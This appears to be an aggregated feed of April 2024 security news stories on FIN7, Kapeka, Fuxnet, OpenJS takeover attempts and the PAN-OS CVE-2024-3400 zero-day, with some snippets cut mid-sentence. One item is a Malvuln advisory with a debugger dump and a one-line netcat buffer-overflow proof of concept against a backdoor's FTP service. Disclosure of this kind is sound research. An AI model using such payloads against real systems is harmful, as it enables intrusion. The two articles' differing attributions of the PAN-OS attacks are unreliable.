Government entities in the Middle East have been targeted as part of a previously undocumented campaign to deliver a new backdoor dubbed CR4T.
Russian cybersecurity company Kaspersky said it discovered the activity in February 2024, with evidence suggesting that it may have been active since at least a year prior. The campaign has been codenamed

Hackers Target Middle East Governments with Evasive "CR4T" Backdoor

The group gained access to the victim network by duping IT employees with high administrative-access privileges.

Source: Scharfsinn via Alamy Stock Photo

Researchers this week shared details of an attack campaign by the infamous FIN7 threat group that targeted a large US-based global automotive manufacturer.

FIN7, a Russian advanced persistent threat (APT) group, also known as Carbon Spider, ELBRUS, and Sangria Tempest, conducted a spear-phishing campaign in late 2023 that was spotted and ultimately halted by BlackBerry's threat and research team. The attackers identified IT employees with high admin-level rights and lured them in by impersonating an IP scanning tool with a malicious URL. Once the employees opened the link, the threat actor ran its Anunak backdoor, allowing them to "gain an initial foothold utilizing living off the land binaries, scripts, and libraries (lolbas)," BlackBerry researchers said in blog post detailing the attack.

BlackBerry said its threat and research team detected and disrupted the attack before FIN7 was able to launch the ransomware portion of the attack.

In the past, FIN7 has targeted US retail, hospitality, and restaurant sectors, though it is now branching out to defense, insurance, and transportation sectors. BlackBerry researchers believe that the threat group is now likely targeting larger entities, with the assumption that they will pay a higher ransom.

BlackBerry did not disclose the name of the targeted automotive manufacturer.

**About the Author(s)**

Russian APT Group Thwarted in Attack on US Automotive Manufacturer

The infamous cybercrime syndicate known as FIN7 has been linked to a spear-phishing campaign targeting the U.S. automotive industry to deliver a known backdoor called Carbanak (aka Anunak).
"FIN7 identified employees at the company who worked in the IT department and had higher levels of administrative rights," the BlackBerry research and intelligence team said in a new write-up.
"They

FIN7 Cybercrime Group Targeting U.S. Auto Industry with Carbanak Backdoor

A new Google malvertising campaign is leveraging a cluster of domains mimicking a legitimate IP scanner software to deliver a previously unknown backdoor dubbed MadMxShell.
"The threat actor registered multiple look-alike domains using a typosquatting technique and leveraged Google Ads to push these domains to the top of search engine results targeting specific search keywords, thereby

Malicious Google Ads Pushing Fake IP Scanner Software with Hidden Backdoor

"Kapeka" and "Fuxnet" are the latest examples of malware to emerge from the long-standing conflict between the two countries.

Source: Andrew Angelov via Shutterstock

Two dangerous malware tools targeted at industrial control systems (ICS) and operating technology (OT) environments in Europe are the latest manifestations of the cyber fallout from the war in Ukraine.

One of the tools, dubbed "Kapeka," appears linked to Sandworm, a prolific Russian state-backed threat actor that Google's Mandiant security group this week described as the country's primary cyberattack unit in Ukraine. Security researchers from Finland-based WithSecure spotted the backdoor featured in 2023 attacks against an Estonian logistics company and other targets in Eastern Europe and perceive it as an active and ongoing threat.

**Destructive Malware**

The other malware — somewhat colorfully dubbed Fuxnet — is a tool that Ukraine government-backed threat group Blackjack likely used in a recent, destructive attack against Moskollector, a company that maintains a large network of sensors for monitoring Moscow's sewage system. The attackers used Fuxnet to successfully brick what they claimed was a total of 1,700 sensor-gateways on Moskollector's network and in the process disabled some 87,000 sensors connected to these gateways.

"The main functionality of the Fuxnet ICS malware was corrupting and blocking access to sensor gateways, and trying to corrupt the physical sensors as well," says Sharon Brizinov, director of vulnerability research at ICS security firm Claroty, which recently investigated Blackjack's attack. As a result of the attack, Moskollector will likely have to physically reach each of the thousands of affected devices and replace them individually, Brizinov says. "To restore \[Moskollector's\] ability of monitoring and operating the sewage system all around Moscow, they will need to procure and reset the entire system."

Kapeka and Fuxnet are examples of the broader cyber fallout from the conflict between Russia and Ukraine. Since the war between the two countries started in February 2022 — and even well before that — hacker groups from both sides developed and used a range of malware tools against each other. Many of the tools, including wipers and ransomware, have been destructive or disruptive in nature and mainly targeted critical infrastructure, ICS, and OT environments in both countries.

But on several occasions, attacks involving tools spawned from the long-standing conflict between the two countries have affected a broader swath of victims. The most notable example remains NotPetya, a malware tool that the Sandworm group originally developed for use in Ukraine, but which ended up impacting tens of thousands of systems worldwide in 2017. In 2023, the UK's National Cyber Security Centre (NCSC) and the US National Security Agency (NSA) warned of a Sandworm malware toolset dubbed "Infamous Chisel" posing a threat to Android users everywhere.

**Kapeka: A Sandworm Replacement for GreyEnergy?**

According to WithSecure, Kapeka is a novel backdoor that attackers can use as an early stage toolkit and for enabling long-term persistence on a victim system. The malware includes a dropper component for dropping the backdoor on a target machine and then removing itself. "Kapeka supports all basic functionalities that allow it to operate as a flexible backdoor in the victim's estate," says Mohammad Kazem Hassan Nejad, a researcher at WithSecure.

Its capabilities include reading and writing files from and to disk, executing shell commands, and launching malicious payloads and processes including living-off-the-land binaries. "After gaining initial access, Kapeka's operator can utilize the backdoor to perform a wide variety of tasks on the victim's machine, such as discovery, deploying additional malware, and staging next stages of their attack," Nejad says.

According to Nejad, WithSecure was able to find evidence suggesting a connection to Sandworm and the group's GreyEnergy malware used in attacks on Ukraine's power grid in 2018. "We believe Kapeka may be a replacement for GreyEnergy in Sandworm's arsenal," Nejad notes. Though the two malware samples do not originate from the same source code, there are some conceptual overlaps between Kapeka and GreyEnergy, just as there were some overlaps between GreyEnergy and its predecessor, BlackEnergy. "This indicates that Sandworm may have upgraded their arsenal with new tooling over time to adapt with the changing threat landscape," Nejad says.

**Fuxnet: A Tool to Disrupt and Destroy**

Meanwhile, Claroty's Brizinov identifies Fuxnet as ICS malware intended to cause damage to specific Russian-made sensor equipment. The malware is meant for deploying on gateways that monitor and collect data from physical sensors for fire alarms, gas monitoring, lighting, and similar use cases.

"Once the malware is deployed, it will brick the gateways by overwriting its NAND chip and disabling external remote access capabilities, preventing operators from remotely controlling the devices," Brizinov says.  

A separate module then attempts to flood the physical sensors themselves with useless M-Bus traffic. M-Bus is a European communications protocol for remotely reading gas, water, electric, and other meters. "One of the main purposes of Blackjack’s Fuxnet ICS malware \[is\] to attack and destroy the physical sensors themselves after gaining access to the sensor gateway," Brizinov says. To do so, Blackjack chose to fuzz the sensors by sending them an unlimited number of M-Bus packets. "In essence, BlackJack hoped that by endlessly sending the sensor random M-Bus packets, the packets would overwhelm them and potentially trigger a vulnerability that would corrupt the sensors and place them in an inoperable state," he says.

The key takeaway for organizations from such attacks is to pay attention to the security basics. Blackjack, for instance, appears to have gained root access to target sensor-gateways by abusing weak credentials on the devices. The attack highlights why it "is important to uphold a good password policy, making sure devices do not share the same credentials or use default ones," he says. "It is also important to deploy good network sanitization and segmentation, making sure attackers would not be able to move laterally inside the network, and deploy their malware to all edge devices."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Dangerous ICS Malware Targets Orgs in Russia and Ukraine

A previously undocumented "flexible" backdoor called Kapeka has been "sporadically" observed in cyber attacks targeting Eastern Europe, including Estonia and Ukraine, since at least mid-2022.
The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as Sandworm (aka APT44 or

Russian APT Deploys New 'Kapeka' Backdoor in Eastern European Attacks

Backdoor.Win32.Dumador.c malware suffers from a buffer overflow vulnerability.

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024  
Original source: https://malvuln.com/advisory/6cc630843cabf23621375830df474bc5.txt  
Contact: malvuln13@gmail.com  
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Dumador.c  
Vulnerability: Remote Stack Buffer Overflow (SEH)  
Description: The malware runs an FTP server on TCP port 10000. Third-party adversaries who can reach the server can send a specially crafted payload triggering a stack buffer overflow overwriting the Structured Exception Handler (SEH).  
Family: Dumador  
Type: PE32  
MD5: 6cc630843cabf23621375830df474bc5  
SHA256: 634eb7d9f5488b46ac44d784da8d82d98a8d86c1c8ef9a838535d44b8e420ea9  
Vuln ID: MVID-2024-0679  
ASLR: False  
DEP: False  
CFG: False  
Safe SEH: False  
Disclosure: 04/15/2024

Memory Dump:  
(16e0.150): Stack buffer overflow - code c0000409 (first/second chance not available)  
eax=00000000 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000000 edi=00000002  
eip=775ced3c esp=0401f208 ebp=0401f248 iopl=0         nv up ei pl nz na po nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202  
ntdll!ZwWaitForMultipleObjects+0xc:  
775ced3c c21400          ret     14h

0:002> .ecxr  
eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194  
eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
kernel32!lstrcpyA+0x1c:  
74657c7c 880c16          mov     byte ptr [esi+edx],cl      ds:002b:04020000=??  
*** WARNING: Unable to verify checksum for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe  
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe

0:002> !analyze -v  
*******************************************************************************  
*                                                                             *  
*                        Exception Analysis                                   *  
*                                                                             *  
*******************************************************************************

FAULTING_IP:   
kernel32!lstrcpyA+1c  
74657c7c 880c16          mov     byte ptr [esi+edx],cl

EXCEPTION_RECORD:  0401f408 -- (.exr 0x401f408)  
ExceptionAddress: 74657c7c (kernel32!lstrcpyA+0x0000001c)  
   ExceptionCode: c0000005 (Access violation)  
  ExceptionFlags: 00000008  
NumberParameters: 2  
   Parameter[0]: 00000001  
   Parameter[1]: 04020000  
Attempt to write to address 04020000

PROCESS_NAME:  Backdoor.Win32.Dumador.c.6cc630843cabf23621375830df474bc5.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  00000015

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

CONTEXT:  0401f458 -- (.cxr 0x401f458)  
eax=0401fec8 ebx=00000000 ecx=0401fe41 edx=0401fbf0 esi=00000410 edi=00000194  
eip=74657c7c esp=0401f8b8 ebp=0401f8e0 iopl=0         nv up ei pl nz na pe nc  
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206  
kernel32!lstrcpyA+0x1c:  
74657c7c 880c16          mov     byte ptr [esi+edx],cl      ds:002b:04020000=??  
Resetting default scope

WRITE_ADDRESS:  04020000 

FOLLOWUP_IP:   
kernel32!lstrcpyA+1c  
74657c7c 880c16          mov     byte ptr [esi+edx],cl

STACK_ADDR_RAW_STACK_SYMBOL: 401fa34

ADDITIONAL_DEBUG_TEXT:  Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER:  from 00401bf3 to 74657c7c

FAULTING_THREAD:  ffffffff

DEFAULT_BUCKET_ID:  STACKIMMUNE

PRIMARY_PROBLEM_CLASS:  STACKIMMUNE

BUGCHECK_STR:  APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE

STACK_TEXT:    
00000000 00000000 unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe+0x0

STACK_COMMAND:  .cxr 000000000401F458 ; kb ; ** Pseudo Context ** ; kb

SYMBOL_NAME:  unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown

DEBUG_FLR_IMAGE_TIMESTAMP:  0

FAILURE_BUCKET_ID:  STACKIMMUNE_c0000409_unknown!Unloaded

BUCKET_ID:  APPLICATION_FAULT_STACKIMMUNE_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_EXPLOITABLE_MISSING_GSFRAME_unknown!backdoor.win32.dumador.c.6cc630843cabf23621375830df474bc5.exe

Followup: MachineOwner  
---------

0:002> !exchain  
0401f2c0: ntdll!_except_handler4+0 (775d6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (776157ad)  
0401f8d0: kernel32!_except_handler4+0 (7466d450)  
  CRT scope  0, filter: kernel32!lstrcpyA+2d (74657c8d)  
                func:   kernel32!lstrcpyA+40 (74657ca0)  
0401ffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
python -c "print('A'*2000)" | nc64.exe x.x.x.x 10000  
220 CONNECTED  
ERROR  
ERROR  
ERROR

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Dumador.c MVID-2024-0679 Buffer Overflow

By Deeba Ahmed
Alarming social engineering attacks target critical open-source projects! Learn how to protect your project and the open-source community from takeovers.
This is a post from HackRead.com Read the original post: OpenSSF Warns of Fake Maintainers Targeting JavaScript Projects

The open-source software community, the foundation of modern technology, is facing a growing threat from social engineering attacks. The Open Source Security (OpenSSF) and OpenJS Foundations issued alerts for social engineering takeovers of open-source projects after unknown malicious actors tried to gain control of an OpenJS-hosted project.

****The Attack****

The OpenJS Foundation Cross Project Council, which hosts popular JavaScript projects used by billions of websites, recently received a series of emails requesting updates to one of its popular JavaScript projects for addressing critical vulnerabilities, with no specifics. The authors wanted OpenJS to designate them as new maintainers although none had privileged access to the project. 

The good news, according to OpenSSF’s blog post, is that the OpenJS Foundation had effective security measures in place, which prevented unauthorized access to the project. The Foundation, demonstrating commendable proactiveness, reported the incident to the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Homeland Security.

This approach resembles a recent incident involving the XZ Utils project, a popular data compression tool, where a malicious actor named Jia Tan infiltrated it by gaining the trust of its maintainer. The attack involved claims of expertise and malicious code insertion.

Soon after, a backdoor in xz/liblzma was discovered on the oss-security mailing list, affecting xz compression tools and libraries with versions 5.6.0 and 5.6.1. Fortunately, the compromise was discovered before widespread damage occurred.

Open-source software can pose threats to any part of the supply chain, but the community’s due diligence and oversight can always ensure quick detection and resolution. 

Open-source maintainers should be cautious against social engineering by implementing measures like Multi-Factor Authentication (MFA), granting contributors the right access, conducting rigorous code reviews, fostering a strong community, and being wary of unsolicited help. Limiting privileges can add additional security, while also being cautious of individuals offering “critical” updates or requesting access.

****Open Source Tools = Lucrative Target****

Over 30 million open-source projects are hosted on the GitHub platform, highlighting their widespread adoption by individuals and businesses. However, this vast number also makes these projects lucrative targets for cybercriminals.

For instance, a few months ago, a new hacker group called GambleForce was discovered exploiting open-source tools to compromise their targets successfully. This has encouraged initiatives such as bug bounty programs from Google and the EU (European Union) specifically for Open Source tools.

****Experts Opinion****

Chris Hughes – chief security advisor at open source security company, Endor Labs and Cyber Innovation Fellow at CISA, where he focuses on supply chain security – says these attack attempts are not surprising, but they do raise awareness of bigger OSS security issues.

“It is not surprising at all to hear about these increased social engineering takeover attempts and these will increase with the recent xz utilities example providing insight to malicious actors on how to conduct this attack, in fact we can likely suspect that many of these are already underway and may have already been successful but haven’t been exposed or identified yet. ” Chris warned.

1.  Enhancing Team Coordination With Open-Source Tools
2.  Patched OpenSSH Exploited for IoT, Linux Cryptomining
3.  Dark Web Pedophiles Using Open-Source AI to Generate CSAM
4.  Use of open-source libraries left web apps vulnerable to attacks

OpenSSF Warns of Fake Maintainers Targeting JavaScript Projects

A sophisticated threat actor is leveraging the bug to deploy a Python backdoor for stealing data and executing other malicious actions.

Source: Tada Images via Shutterstock

Palo Alto Networks (PAN) on April 14 released hotfixes to address a maximum severity zero-day bug in multiple versions of its PAN-OS software that a threat actor is using to deploy a novel Python backdoor on affected firewalls.

The flaw — tracked as CVE-2024-3400 — is present in PAN-OS 10.2, 11.0, and 11.1 firewalls when the GlobalProtect Gateway and device telemetry features are both enabled. PAN disclosed the flaw April 12 after researchers at Volexity found the bug when investigating suspicious activity on a customer's firewall.  

**Limited Attack**

PAN described the attacks targeting the flaw as limited in volume and attributed the attack activity to a single threat cluster that the company is tracking as "Operation Midnight Eclipse." However, the vendor did not rule out the potential for other attackers to exploit the flaw as well.   

When PAN disclosed the flaw last week, it recommended temporary measures that customers could take to mitigate the threat — including disabling device telemetry. On April 14, the company made available hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and all later PAN-OS versions. The security vendor urged customers to apply the updates and promised similar hotfixes for other maintenance releases of the software.

Reports of attackers targeting the flaw before a patch was available prompted the US Cybersecurity and Infrastructure Agency (CISA) last week to quickly add CVE-2024-3400 to its catalog of known exploited vulnerabilities. All civilian federal agencies have until April 19 to address the flaw. CISA has previously warned organizations on multiple occasions about high threat-actor interest in VPNs and other remote access technologies from vendors such as Pulse Secure, Cisco, and PAN because of the privileged access these devices provide to enterprise networks and data.

**Max Severity Command Injection Flaw**

In a blog post last week, Volexity described the flaw it discovered as a command injection vulnerability in PAN-OS GlobalProtect that gave unauthenticated remote attackers a way to execute arbitrary code on affected systems. The security vendor said it had observed an attacker — which it's tracking as UTA0218 — leveraging the flaw to create a reverse shell and download additional malware on compromised systems.

"The attacker focused on exporting configuration data from the devices, and then leveraging it as an entry point to move laterally within the victim organizations," Volexity said.

One of the additional tools that the threat actor deployed on compromised systems was a novel Python backdoor that Volexity has named Upstyle. The security vendor said it found the threat actor using the Upstyle backdoor to execute a variety of additional commands including those for lateral movement within a target network and to steal credentials and other sensitive data from it.

"The tradecraft and speed employed by the attacker suggests a highly capable threat actor with a clear playbook of what to access to further their objectives," Volexity warned. Volexity said it was not able to determine the exact scale of the exploit activity but surmised it was likely limited and targeted. The company said it had found evidence of UTA0218 attempting to exploit the vulnerability at multiple organizations on March 26 and March 27.

PAN said its analysis showed the threat actor using the backdoor to run a handful of commands on vulnerable firewalls. The commands included one for copying configuration files and exfiltrating them via HTTP requests and another that set up the firewall to receive even more commands, this time from a different URL. "Lastly, the threat actor cleaned up after themselves by removing all files associated with the backdoors and clearing their cronjobs," PAN said.

**Complete Control**

Karl Sigler, senior security research manager at Trustwave's SpiderLabs, says exploiting CVE-2024-3400 would give an attacker complete control over the PAN device. "This could allow the attacker a foothold to pivot further into the organization," he says. "It could also allow the attacker to disable protections provided by the device, including disabling access control lists and VPN connections."

Sigler says the vulnerability exploit in this case works by getting an affected device to log OS commands in an error log. These commands are then processed and executed with root-level permissions, he says. "Disabling device telemetry disables the log file, short-circuiting the attack," Sigler notes. "The main risk in doing so is that network admins often rely on this telemetry to troubleshoot problems with the device. Additionally, monitoring for abnormal network behavior may be evidence of an ongoing attack. Disabling telemetry may hinder those efforts."

Palo Alto itself has recommended that organizations that are unable to immediately update their software for any reason should disable device telemetry till they are able to update. According to the company, "Once upgraded, device telemetry should be re-enabled on the device."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Palo Alto Network Issues Hotfixes for Zero-Day Bug in Its Firewall OS

By Deeba Ahmed
Firewall on fire!
This is a post from HackRead.com Read the original post: Palo Alto Patches 0-Day (CVE-2024-3400) Exploited by Python Backdoor

Palo Alto Networks issues critical patches for a zero-day vulnerability (CVE-2024-3400) in their PAN-OS firewalls. Exploited by attackers to deploy Python backdoors, this flaw grants root access. Update immediately!

In a race against time, Palo Alto Networks has released patches for a critical 0-day (or zero-day) vulnerability (CVE-2024-3400) that threatened to leave firewalls exposed to cyberattacks.

According to Palo Alto Networks’ security advisory, the vulnerability was found in its PAN-OS operating system’s GlobalProtect functionality, related to the way it handled device telemetry data. 

An attacker could exploit this flaw by crafting a malicious payload disguised as telemetry data.  Once processed by the firewall, the payload could execute arbitrary code with root privileges, essentially giving the attacker complete control over the device. 

****Which Devices Are Vulnerable?****

Appliances with GlobalProtect and device telemetry enabled are declared vulnerable. The Shodan search engine for exposed Internet of Things (IoT) devices reveals approximately 41,336 potentially impacted internet-exposed appliances of Palo Alto Networks.

SecurityWeek reports that several organizations have already fallen victim to targeting, with certain attackers endeavouring to deploy Upstyle, a fresh Python backdoor.

****Possible Dangers****

Like any other security vulnerability, this one also lets hackers exploit and establish backdoors, launch lateral attacks, steal sensitive data, and disrupt network operations. Threat actors can also create persistent access points, use the compromised firewall as a springboard, and gain access to confidential information.

Additionally, it may allow hackers to take full control of the firewall’s functionality, potentially leading to network outages or traffic manipulation.

****Detection and Patching:****

The good news is that the vulnerability was identified and patched relatively quickly. Security firm Volexity first detected the exploit in use in late March 2024, observing a threat actor UTA0218 remotely exploiting a firewall device.

The researchers also observed how the threat actor created a reverse shell, downloading additional tools, and exporting configuration data to use it as an entry point for lateral movement. Volexity swiftly alerted Palo Alto Networks, which issued security alerts and hotfixes to address the vulnerability for PAN-OS versions 10.2, 11.0, and 11.1.

Palo Alto Networks suggests that if customers can’t implement the Threat Prevention-based mitigation immediately, you can still reduce the impact of the vulnerability by temporarily turning off device telemetry until the device is updated to a PAN-OS version that addresses the issue.

> _“If you are unable to apply the Threat Prevention based mitigation at this time, you can still mitigate the impact of this vulnerability by temporarily disabling device telemetry until the device is upgraded to a fixed PAN-OS version. Once upgraded, device telemetry should be re-enabled on the device. If the firewalls are managed by Panorama, ensure that device telemetry is disabled in relevant templates (Panorama > Templates).”_
> 
> Palo Alto Networks

****Who Was Behind the Attacks?****

As per Volexity’s blog post, the zero-day exploit was highly sophisticated and targeted specific configurations, suggesting a well-resourced state-sponsored attacker with a clear target in mind could be involved.

Initial attribution attempts point towards Lazarus Group, a notorious hacking group believed to be affiliated with North Korea and BianLian, which targets critical infrastructure organizations. Nevertheless, Palo Alto Networks has urged all users to update their PAN-OS software immediately.

1.  Hackers dump login data of Fortinet VPN users in plain-text
2.  Private details of Palo Alto Networks employees leaked online
3.  Cisco Fixes High-Severity Code Execution, VPN Hijacking Flaws

Tag

#backdoor